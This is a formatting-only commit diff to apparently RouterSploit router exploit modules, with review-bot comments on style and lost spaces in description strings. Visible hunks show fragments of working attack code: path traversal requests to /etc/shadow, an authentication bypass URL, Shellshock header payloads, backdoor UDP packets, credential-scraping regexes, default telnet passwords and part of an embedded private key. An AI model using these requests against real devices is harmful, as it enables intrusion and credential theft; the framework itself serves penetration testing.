Commit 350f1212 by fwkz

Fixing PEP8 violations.

parent 73e8b5cd
......@@ -42,7 +42,7 @@ class Exploit(exploits.Exploit):
print_status("Sending read {} file request".format(self.filename))
url = "{}:{}/goform/enhAuthHandler".format(self.target, self.port)
headers = {u"Content-Type": u"application/x-www-form-urlencoded"}
data = {"__ENH_SHOW_REDIRECT_PATH__": "/pages/C_4_0.asp/../../..{}".format(self.filename),
......
......@@ -49,7 +49,7 @@ class Exploit(exploits.Exploit):
# checking if the target is valid
url = "{}:{}/".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
......@@ -59,7 +59,7 @@ class Exploit(exploits.Exploit):
# checking if authentication can be bypassed
url = "{}:{}/xslt".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
......
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': '3Com 3CRADSL72 Info Disclosure',
'description': 'Exploits 3Com 3CRADSL72 information disclosure vulnerability that allows to fetch credentials for SQL sa account',
'description': 'Exploits 3Com 3CRADSL72 information disclosure vulnerability '
'that allows to fetch credentials for SQL sa account',
'authors': [
'Karb0nOxyde <karb0noxyde[at]gmail.com>', # vulnerability discovery
'Ivan Casado Ruiz <casadoi[at]yahoo.co.uk>', # vulnerability discovery
......@@ -28,7 +29,7 @@ class Exploit(exploits.Exploit):
'http://www.securityfocus.com/bid/11408/exploit',
],
'devices': [
'3Com 3CRADSL72',
'3Com 3CRADSL72',
],
}
......
......@@ -48,7 +48,7 @@ class Exploit(exploits.Exploit):
print_status("Extracting credentials")
username = re.findall('<input type="text" name="szUsername" size=16 value="(.+?)">', response.text)
password = re.findall('<input type="password" name="szPassword" size=16 maxlength="16" value="(.+?)">', response.text)
if len(username) and len(password):
print_success("Exploit success")
creds.append((username[0], password[0]))
......
......@@ -26,7 +26,7 @@ class Exploit(exploits.Exploit):
'https://www.exploit-db.com/exploits/12680/',
],
'devices': [
'3Com Intelligent Management Center',
'3Com Intelligent Management Center',
],
}
......
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': '3Com IMC Path Traversal',
'description': 'Exploits 3Com Intelligent Management Center path traversal vulnerability. If the target is vulnerable it is possible to read file from the filesystem.',
'description': 'Exploits 3Com Intelligent Management Center path traversal vulnerability. '
'If the target is vulnerable it is possible to read file from the filesystem.',
'authors': [
'Richard Brain', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -26,7 +27,7 @@ class Exploit(exploits.Exploit):
'https://www.exploit-db.com/exploits/12679/',
],
'devices': [
'3Com Intelligent Management Center',
'3Com Intelligent Management Center',
],
}
......@@ -34,7 +35,6 @@ class Exploit(exploits.Exploit):
port = exploits.Option(8080, 'Target port') # default port
filename = exploits.Option('\\windows\\win.ini', 'File to read from the filesystem')
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
......
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': '3Com OfficeConnect Info Disclosure',
'description': 'Exploits 3Com OfficeConnect information disclosure vulnerability. If the target is vulnerable it is possible to read sensitive information.',
'description': 'Exploits 3Com OfficeConnect information disclosure vulnerability. '
'If the target is vulnerable it is possible to read sensitive information.',
'authors': [
'Luca Carettoni <luca.carettoni[at]ikkisoft.com>', # vulnerablity discovery
'iDefense', # vulnerability discovery
......@@ -28,7 +29,7 @@ class Exploit(exploits.Exploit):
'http://seclists.org/vulnwatch/2005/q1/42',
],
'devices': [
'3Com OfficeConnect',
'3Com OfficeConnect',
],
}
......@@ -59,13 +60,13 @@ class Exploit(exploits.Exploit):
@mute
def check(self):
for resource in self.resources:
for resource in self.resources:
url = "{}:{}{}".format(self.target, self.port, resource)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if "pppoe_username" in response.text and "pppoe_password" in response.text:
self.valid = resource
return True # target is vulnerable
......
......@@ -23,10 +23,10 @@ class Exploit(exploits.Exploit):
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://github.com/lucyoa/exploits/blob/master/asmax/asmax.txt',
'https://github.com/lucyoa/exploits/blob/master/asmax/asmax.txt',
],
'devices': [
'Asmax AR 1004g',
'Asmax AR 1004g',
],
}
......
......@@ -70,7 +70,7 @@ class Exploit(exploits.Exploit):
sock.bind(('0.0.0.0', 9999))
sock.settimeout(2)
packet = (b'\x0C\x15\x33\x00'+ os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(cmd)) + cmd).ljust(512, b'\x00')
packet = (b'\x0C\x15\x33\x00' + os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(cmd)) + cmd).ljust(512, b'\x00')
try:
sock.sendto(packet, (self.target, 9999))
......@@ -86,7 +86,7 @@ class Exploit(exploits.Exploit):
if len(data) == 512 and data[1] == "\x16":
break
length = struct.unpack('<H', data[14:16])[0]
output = data[16:16+length]
output = data[16:16 + length]
sock.close()
return output
......
......@@ -18,7 +18,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Belkin G Info Disclosure',
'description': 'Module exploits Belkin Wireless G Plus MIMO Router F5D9230-4 information disclosure vulnerability which allows fetching sensitive information such as credentials.',
'description': 'Module exploits Belkin Wireless G Plus MIMO Router F5D9230-4 information disclosure '
'vulnerability which allows fetching sensitive information such as credentials.',
'authors': [
'DarkFig', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -42,15 +43,17 @@ class Exploit(exploits.Exploit):
if response is None:
return
var = ['pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd']
var = [
'pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd'
]
data = []
for v in var:
......@@ -76,15 +79,17 @@ class Exploit(exploits.Exploit):
if response is None:
return False # target is not vulnerable
var = ['pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd']
var = [
'pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd'
]
if any(map(lambda x: x in response.text, var)):
return True # target vulnerable
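Review bot: The nine-name `var` list is written out in full twice in this section, once in the hunk at old line 42 and again in the hunk at old line 76, so the two copies can drift apart when a field is added to one. Both enclosing methods start outside the hunks, but from what is visible a single class-level tuple referenced from both places would remove the duplication. The membership test `any(map(lambda x: x in response.text, var))` would also read more directly as `any(v in response.text for v in var)`.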
......
......@@ -58,4 +58,3 @@ class Exploit(exploits.Exploit):
return True # target is vulnerable
return False # target is not vulnerable
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Cisco UCM Info Disclosure',
'description': 'Module exploits information disclosure vulnerability in Cisco UCM devices. If the target is vulnerable it is possible to read sensitive information through TFTP service.',
'description': 'Module exploits information disclosure vulnerability in Cisco UCM devices. '
'If the target is vulnerable it is possible to read sensitive information through TFTP service.',
'authors': [
'Daniel Svartman <danielsvartman[at]gmail.com', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -72,4 +73,3 @@ class Exploit(exploits.Exploit):
return True # target is vulnerable
return False # target is not vulnerable
......@@ -19,7 +19,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Cisco UCS Manager RCE',
'description': 'Module exploits Cisco UCS Manager 2.1 (1b) Remote Code Execution vulnerability which allows executing commands on operating system level.',
'description': 'Module exploits Cisco UCS Manager 2.1 (1b) Remote Code Execution vulnerability which '
'allows executing commands on operating system level.',
'authors': [
'thatchriseckert', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -84,4 +85,3 @@ class Exploit(exploits.Exploit):
return True
return False
......@@ -10,7 +10,7 @@ from routersploit import (
http_request,
mute,
validators,
)
)
class Exploit(exploits.Exploit):
......@@ -23,13 +23,13 @@ class Exploit(exploits.Exploit):
'description': 'WiFi router Comtrend CT 5361T suffers from a Password Disclosure Vulnerability',
'authors': [
'TUNISIAN CYBER', # routersploit module
],
],
'references': [
'https://packetstormsecurity.com/files/126129/Comtrend-CT-5361T-Password-Disclosure.html'
],
],
'devices': [
'Comtrend CT 5361T (more likely CT 536X)',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
......
......@@ -18,7 +18,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'D-Link DIR-300 & DIR-320 & DIR-600 & DIR-615 Info Disclosure',
'description': 'Module explois information disclosure vulnerability in D-Link DIR-300, DIR-320, DIR-600, DIR-615 devices. It is possible to retrieve sensitive information such as credentials.',
'description': 'Module explois information disclosure vulnerability in D-Link DIR-300, DIR-320, DIR-600,'
'DIR-615 devices. It is possible to retrieve sensitive information such as credentials.',
'authors': [
'tytusromekiatomek <tytusromekiatomek[at]inbox.com>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -63,7 +64,7 @@ class Exploit(exploits.Exploit):
return False # target is not vulnerable
creds = re.findall("\n\t\t\t(.+?):(.+?)\n\n\t\t\t", response.text)
if len(creds):
return True # target is vulnerable
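Review bot: The wrapped `description` literal in the first hunk of this section drops the space at the join, so the adjacent strings concatenate to `DIR-600,DIR-615 devices`; end the first piece with a space, `'... DIR-320, DIR-600, '`. The same wrap loses a space in the later description strings for the D-Link DIR-300/320/615 auth bypass (`DIR-615revD`), Huawei HG520, IPFire Shellshock, Linksys WAP54Gv3 (two joins), Netgear ProSafe (`ProSafeWC9500`), TP-Link WDR740 and the ZTE F609 and F660 modules. The 3Com, Belkin and Cisco descriptions earlier on the page keep the trailing space inside the quotes, so only these modules now show altered text to the user. A formatting-only commit should leave runtime strings byte-identical; comparing each concatenated value with the old one-line literal would catch this.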
......
......@@ -15,7 +15,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'D-Link DIR-300 & DIR-320 & DIR-615 Auth Bypass',
'description': 'Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615 revD devices. It is possible to access administration panel without providing password.',
'description': 'Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615'
'revD devices. It is possible to access administration panel without providing password.',
'authors': [
'Craig Heffner', # vulnerability discovery
'Karol Celin', # vulnerability discovery
......@@ -58,7 +59,7 @@ class Exploit(exploits.Exploit):
# checking if authentication can be baypassed
url = "{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
......
......@@ -19,7 +19,7 @@ class Exploit(exploits.Exploit):
'name': 'D-Link DIR-645 & DIR-815 RCE',
'description': 'Module exploits D-Link DIR-645 and DIR-815 Remote Code Execution vulnerability which allows executing command on the device.',
'authors': [
'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery
'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
......
......@@ -38,7 +38,6 @@ class Exploit(exploits.Exploit):
dns1 = exploits.Option('8.8.8.8', 'Primary DNS Server')
dns2 = exploits.Option('8.8.4.4', 'Seconary DNS Server')
def run(self):
url = "{}:{}/dnscfg.cgi?dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=".format(self.target,
self.port,
......
......@@ -66,7 +66,18 @@ class Exploit(exploits.Exploit):
def check(self):
# address and parameters
url = "{}:{}/cgi-bin/webproc".format(self.target, self.port)
data = {"getpage": "html/index.html","*errorpage*": "../../../../../../../../../../../etc/shadow", "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "blah", "%3Apassword": "blah","%3Aaction": "login","%3Asessionid": "abcdefgh"}
data = {
"getpage": "html/index.html",
"*errorpage*": "../../../../../../../../../../../etc/shadow",
"var%3Amenu": "setup",
"var%3Apage": "connected",
"var%": "",
"objaction": "auth",
"%3Ausername": "blah",
"%3Apassword": "blah",
"%3Aaction": "login",
"%3Asessionid": "abcdefgh"
}
# connection
response = http_request(method="POST", url=url, data=data)
......@@ -77,4 +88,3 @@ class Exploit(exploits.Exploit):
return True # target vulnerable
return False # target not vulnerable
......@@ -49,7 +49,7 @@ class Exploit(exploits.Exploit):
regexp = "<{}>(.+?)</{}>".format(option, option)
value = re.findall(regexp, response.text)
if value:
res.append((option, value[0]))
res.append((option, value[0]))
if len(res):
print_success("Found sensitive information!")
......
......@@ -16,7 +16,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Huawei HG520 Information Disclosure',
'description': 'Module exploits Huawei EchoLife HG520 information disclosure vulnerablity. If the target is vulnerable it is possible to retrieve sensitive information.',
'description': 'Module exploits Huawei EchoLife HG520 information disclosure vulnerablity.'
'If the target is vulnerable it is possible to retrieve sensitive information.',
'authors': [
'hkm', # vulnerablity discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -70,7 +71,7 @@ class Exploit(exploits.Exploit):
def run(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10)
print_status("Sending exploit payload")
sock.sendto(self.payload, (self.target, 43690))
......@@ -95,7 +96,7 @@ class Exploit(exploits.Exploit):
response = sock.recv(1024)
except:
return False # target is not vulnerable
if len(response):
return True # target is vulnerable
......
......@@ -48,7 +48,7 @@ class Exploit(exploits.Exploit):
if response.status_code == 200:
print_success("Administrator's password has been changed to {}".format(self.password))
else:
print_error("Exploit failed - could not change password")
print_error("Exploit failed - could not change password")
else:
print_error("Exploit failed - target seems to be not vulnerable")
......
......@@ -18,7 +18,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'IPFire Shellshock',
'description': 'Exploits shellshock vulnerability in IPFire M= 2.15 Core Update 82. If the target is vulnerable it is possible to execute commands on operating system level.',
'description': 'Exploits shellshock vulnerability in IPFire M= 2.15 Core Update 82.'
'If the target is vulnerable it is possible to execute commands on operating system level.',
'authors': [
'Claudio Viviani', # vulnerability discovery
'Marcin Bury <marcin.bury@reverse-shell.com>', # routersploit module
......@@ -27,7 +28,7 @@ class Exploit(exploits.Exploit):
'https://www.exploit-db.com/exploits/34839',
],
'devices': [
'IPFire <= 2.15 Core Update 82',
'IPFire <= 2.15 Core Update 82',
],
}
......@@ -72,7 +73,7 @@ class Exploit(exploits.Exploit):
return ""
if response.status_code == 200:
start = response.text.find(marker) + len(marker) + 1 # marker and whitespace
start = response.text.find(marker) + len(marker) + 1 # marker and whitespace
end = response.text.find(marker, start) - 48
return response.text[start:end]
......@@ -86,7 +87,7 @@ class Exploit(exploits.Exploit):
marker = random_text(32)
cmd = "echo {}".format(marker)
payload = self.payload.replace("{{cmd}}", cmd)
headers = {
'VULN': payload,
}
......
......@@ -19,7 +19,9 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Linksys WAP54Gv3',
'description': 'Module exploits remote command execution in Linksys WAP54Gv3 devices. Debug interface allows executing root privileged shell commands is available on dedicated web pages on the device.',
'description': 'Module exploits remote command execution in Linksys WAP54Gv3 devices.'
'Debug interface allows executing root privileged shell commands is available'
'on dedicated web pages on the device.',
'authors': [
'Phil Purviance', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -64,7 +66,7 @@ class Exploit(exploits.Exploit):
if len(res):
return res[0]
return ""
@mute
......
......@@ -53,10 +53,10 @@ class Exploit(exploits.Exploit):
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
00 0f 00 01 01
'''
hb = '''
hb = '''
18 03 02 00 03
01 40 00
'''
......@@ -66,9 +66,9 @@ class Exploit(exploits.Exploit):
def hexdump(self, s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
lin = [c for c in s[b: b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
......@@ -77,7 +77,7 @@ class Exploit(exploits.Exploit):
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
......@@ -92,7 +92,7 @@ class Exploit(exploits.Exploit):
rdata += data
remain -= len(data)
return rdata
return rdata
def recvmsg(self, s):
hdr = self.recvall(s, 5)
......@@ -139,11 +139,11 @@ class Exploit(exploits.Exploit):
while True:
typ, ver, pay = self.recvmsg(s)
if typ == None:
if typ is None:
print_error("Server closed connection without sending Server Hello.")
print_error("Exploit failed")
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
......@@ -163,7 +163,7 @@ class Exploit(exploits.Exploit):
while True:
typ, ver, pay = self.recvmsg(s)
if typ == None:
if typ is None:
return False # target is not vulnerable
if typ == 22 and ord(pay[0]) == 0x0E:
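Review bot: In `hexdump` the slice is now written `s[b: b + 16]`, which leaves the colon with a space on one side only; PEP 8 treats the slice colon like a binary operator with equal spacing on both sides, so `s[b:b + 16]` is the consistent form. Two lines further down, `'.')for c in lin` still has no space before `for`; `... else '.') for c in lin)` finishes the cleanup. Both are whitespace-only changes and do not alter the output.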
......
......@@ -31,7 +31,7 @@ class Exploit(exploits.Exploit):
'http://blog.trendmicro.com/trendlabs-security-intelligence/shell-attack-on-your-server-bash-bug-cve-2014-7169-and-cve-2014-6271/',
],
'devices': [
'Multi',
'Multi',
],
}
......@@ -106,7 +106,7 @@ class Exploit(exploits.Exploit):
response = http_request(method=self.method, url=url, headers=headers)
if response is None:
continue
if str(solution) in response.text:
self.valid = payload
return True # target is vulnerable
......
......@@ -147,7 +147,7 @@ class Exploit(exploits.Exploit):
"""
},
{ # loadbalancer.org enterprise va
"user":"root",
"user": "root",
"private_key": """
-----BEGIN DSA PRIVATE KEY-----
MIIBugIBAAKBgQCsCgcOw+DgNR/7g+IbXYdOEwSB3W0o3l1Ep1ibHHvAtLb6AdNW
......
......@@ -85,7 +85,7 @@ class Exploit(exploits.Exploit):
print_error("Target is not vulnerable")
def execute(self, s, message, payload=""):
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload)+1)
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload) + 1)
s.send(header + payload + "\x00")
r = s.recv(0xC)
......
......@@ -79,7 +79,7 @@ class Exploit(exploits.Exploit):
print self.execute(s, 7, cmd.strip("\n"))
def execute(self, s, message, payload=""):
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload)+1)
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload) + 1)
s.send(header + payload + "\x00")
r = s.recv(0xC)
......
......@@ -27,8 +27,8 @@ class Exploit(exploits.Exploit):
'http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/',
],
'devices': [
'Netcore',
'Netis',
'Netcore',
'Netis',
],
}
......@@ -65,7 +65,7 @@ class Exploit(exploits.Exploit):
sock.settimeout(10.0)
try:
sock.sendto(payload, (self.target, 53413))
sock.sendto(payload, (self.target, 53413))
response = sock.recv(1024)
except:
pass
......
......@@ -25,15 +25,15 @@ class Exploit(exploits.Exploit):
'http://www.shellshocklabs.com/2015/09/part-1en-hacking-netgear-jwnr2010v5.html',
],
'devices': [
'Netgear N300',
'Netgear JNR1010v2',
'Netgear JNR3000',
'Netgear JWNR2000v5',
'Netgear JWNR2010v5',
'Netgear R3250',
'Netgear WNR2020',
'Netgear WNR614',
'Netgear WNR618',
'Netgear N300',
'Netgear JNR1010v2',
'Netgear JNR3000',
'Netgear JWNR2000v5',
'Netgear JWNR2010v5',
'Netgear R3250',
'Netgear WNR2020',
'Netgear WNR614',
'Netgear WNR618',
]
}
......
......@@ -19,24 +19,25 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Netgear ProSafe RCE',
'description': 'Module exploits remote command execution vulnerability in Netgear ProSafe WC9500, WC7600, WC7520 devices. If the target is vulnerable command shell is invoked.',
'description': 'Module exploits remote command execution vulnerability in Netgear ProSafe'
'WC9500, WC7600, WC7520 devices. If the target is vulnerable command shell is invoked.',
'authors': [
'Andrei Costin <andrei[at]firmware.re>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'Andrei Costin <andrei[at]firmware.re>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://firmware.re/vulns/acsa-2015-002.php',
'https://www.blackhat.com/docs/asia-16/materials/asia-16-Costin-Automated-Dynamic-Firmware-Analysis-At-Scale-A-Case-Study-On-Embedded-Web-Interfaces.pdf',
],
],
'devices': [
'Netgear ProSafe WC9500',
'Netgear ProSafe WC7600',
'Netgear ProSafe WC7520',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
......@@ -44,7 +45,7 @@ class Exploit(exploits.Exploit):
print_status("Invoking command loop...")
self.command_loop()
else:
print_error("Target is not vulnerable")
print_error("Target is not vulnerable")
def command_loop(self):
while 1:
......
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'TP-Link WDR740ND & WDR740N Path Traversal',
'description': 'Exploits TP-Link WDR740ND and WDR740N path traversal vulnerability that allows to read files from the filesystem.',
'description': 'Exploits TP-Link WDR740ND and WDR740N path traversal vulnerability'
'that allowsto read files from the filesystem.',
'authors': [
'websec.ca', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -26,8 +27,8 @@ class Exploit(exploits.Exploit):
'http://www.websec.mx/publicacion/advisories/tplink-wdr740-path-traversal',
],
'devices': [
'TP-Link WDR740ND',
'TP-Link WDR740N',
'TP-Link WDR740ND',
'TP-Link WDR740N',
],
}
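Review bot: The second piece of the wrapped description now reads `'that allowsto read files from the filesystem.'`, where the old one-line string had `allows to`, so the wrap removed a space inside the text as well as at the join after `vulnerability`. Restoring both gives `'... path traversal vulnerability '` followed by `'that allows to read files from the filesystem.'`, which matches the original string exactly.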
......
......@@ -103,7 +103,7 @@ class Exploit(exploits.Exploit):
upload_params = {'file': ('../../../../tmp/airview.uavr', tmp_payload, {'Expect': ''})}
response = http_request(url=upload_url, method='POST', files=upload_params)
tmp_payload.close()
if response is None:
......@@ -116,9 +116,9 @@ class Exploit(exploits.Exploit):
# Upload empty file to "clear" the airview.uavr file
clean_tmp_file = tempfile.TemporaryFile()
clean_tmp_file.seek(0)
upload_params = {'file': ('../../../../tmp/airview.uavr', clean_tmp_file, {'Expect': ''})}
http_request(url=upload_url, method='POST', files=upload_params)
clean_tmp_file.close()
......
......@@ -16,7 +16,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'ZTE F609 Config Disclosure',
'description': 'Module exploits ZTE F609 Config Disclosure. If the target is possible to authentiate to the device.',
'description': 'Module exploits ZTE F609 Config Disclosure.'
'If the target is possible to authentiate to the device.',
'authors': [
'devilscream', # routersploit module
],
......@@ -29,8 +30,8 @@ class Exploit(exploits.Exploit):
}
target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
config = "sendcmd 1 DB p DevAuthInfo"
def run(self):
......
......@@ -16,7 +16,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'ZTE F660 Config Disclosure',
'description': 'Module exploits ZTE F660 Config Disclosure. If the target is possible to authentiate to the device.',
'description': 'Module exploits ZTE F660 Config Disclosure.'
'If the target is possible to authentiate to the device.',
'authors': [
'devilscream', # vulnerability discovery & routersploit module
],
......@@ -29,8 +30,8 @@ class Exploit(exploits.Exploit):
}
target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
config = "cat /userconfig/cfg/db_user_cfg.xml | grep -E 'UserName|Username|Password|password|ESSID|KeyPhase'"
def run(self):
......
......@@ -31,8 +31,8 @@ class Exploit(exploits.Exploit):
}
target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
def run(self):
try:
......@@ -59,7 +59,7 @@ class Exploit(exploits.Exploit):
tn.close()
except:
print_error("Connection error {}:{}".format(self.target, self.port))
@mute
def check(self):
try:
......